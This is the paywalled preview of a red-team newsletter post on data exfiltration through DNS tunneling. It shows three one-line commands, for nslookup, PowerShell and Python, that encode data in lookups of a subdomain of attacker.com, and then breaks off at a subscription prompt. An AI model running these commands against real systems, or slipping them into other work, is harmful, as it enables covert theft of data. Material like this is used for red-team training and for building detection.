Exfiltration Method for Channels

Jan 26, 2025

∙ Paid

DNS Tunneling

Using nslookup on Linux/macOS:

nslookup SensitiveData.attacker.com

Using PowerShell on Windows:

[System.Net.Dns]::GetHostAddresses("SensitiveData.attacker.com") | ForEach-Object { $_.ToString() }

Using Python on Linux/macOS/Windows:

python -c "import socket; print(socket.gethostbyname('SensitiveData.attacker.com'))"

This one would send 45 bytes p…

Keep reading with a 7-day free trial

Subscribe to RedTeamGuides to keep reading this post and get 7 days of free access to the full post archives.

#nojs-banner { position: fixed; bottom: 0; left: 0; padding: 16px 16px 16px 32px; width: 100%; box-sizing: border-box; background: red; color: white; font-family: -apple-system, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 13px; line-height: 13px; } #nojs-banner a { color: inherit; text-decoration: underline; } This site requires JavaScript to run correctly. Please turn on JavaScript or unblock scripts